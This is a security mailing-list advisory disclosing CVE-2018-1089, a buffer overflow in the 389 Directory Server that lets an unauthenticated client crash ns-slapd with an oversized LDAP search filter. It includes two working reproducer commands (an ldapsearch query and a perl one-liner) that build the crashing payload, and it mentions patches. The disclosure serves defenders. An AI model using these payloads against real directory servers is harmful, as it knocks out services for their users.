Re: CVE-2018-1089 389-ds-base: unauthenticated ns-slapd crash via large filter value in ldapsearch

[Cedric Buissart <cbuissar () redhat com>]

On Mon, May 7, 2018 at 5:30 PM, Cedric Buissart <cbuissar () redhat com> wrote:

> Hi all,
>
> This is to disclose the following flaw, CVE-2018-1089 :
>
> 389-ds-base, a.k.a 389 Directory Server, https://pagure.io/389-ds-base/,
> is a highly usable, fully featured, reliable and secure LDAP server
> implementation. It handles many of the largest LDAP deployments in the
> world.
>
> 389-ds server did not properly handle characters needed to be escaped in
> its query filter. This could result in buffer overflows, from the heap
> or the stack, on larger filters.  An unauthenticated attacker could send
> a specially crafted LDAP request and crash the server. RCE has not been
> demonstrated at this time.
>
> Red Hat would like to thank Greg Kubok for alerting us of the issue.
>
>
> Reproducer1 :
> [root@server1 ~]# payload=$(printf '.*$%.0s' {1..1000})
> [root@server1 ~]# ldapsearch -h localhost -p 389 -x -b "dc=blah"
> "(&(|(telephoneNumber=*${payload}*)(uid=*${payload}*)(
> title=*${payload}*)(sn=*${payload}*)(ou=*${payload}*)(
> givenName=*${payload}*))(objectClass=posixaccount))"
> "telephoneNumber sshpubkeyfp ipaSshPubKey uid krbCanonicalName title
> loginShell uidNumber gidNumber sn homeDirectory mail krbPrincipalName
> givenName nsAccountLock"
>
> Reproducer2:
> [root@server1 ~]# perl -e 'print ".*\$" x (1400)' | ldapsearch -x -f-
> "(&(uid=%s)(objectClass=posixaccount))"
>
>
> Patch attached for versions 1.3.7 & 1.2.11
Patches are now attached for real.

> Thanks!
>
> --
> Cedric Buissart,
> Product Security



-- 
Cedric Buissart,
Product Security

Attachment: v1.3.7.5-CVE-2018-1089-Crash-from-long-search-filter.patch
Description:

Attachment: v1.2.11.15-CVE-2018-1089-crash-in-long-search-filter.patch
Description: